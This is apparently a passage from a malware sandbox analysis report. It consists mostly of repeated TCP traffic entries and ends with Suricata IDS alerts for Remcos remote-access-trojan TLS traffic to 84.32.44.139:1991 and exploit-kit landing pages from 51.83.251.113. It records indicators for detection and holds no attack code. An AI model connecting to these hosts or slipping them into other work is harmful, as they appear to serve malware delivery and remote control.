              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 51.83.251.113:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.83.251.113:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.199.111.133:443
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 185.199.111.133:443 -> 192.168.2.22:49166

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49168 -> 84.32.44.139:1991
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49169 -> 84.32.44.139:1991
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49171 -> 84.32.44.139:1991
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49170 -> 84.32.44.139:1991
              Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 51.83.251.113:80 -> 192.168.2.22:49167
              Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 51.83.251.113:80 -> 192.168.2.22:49167
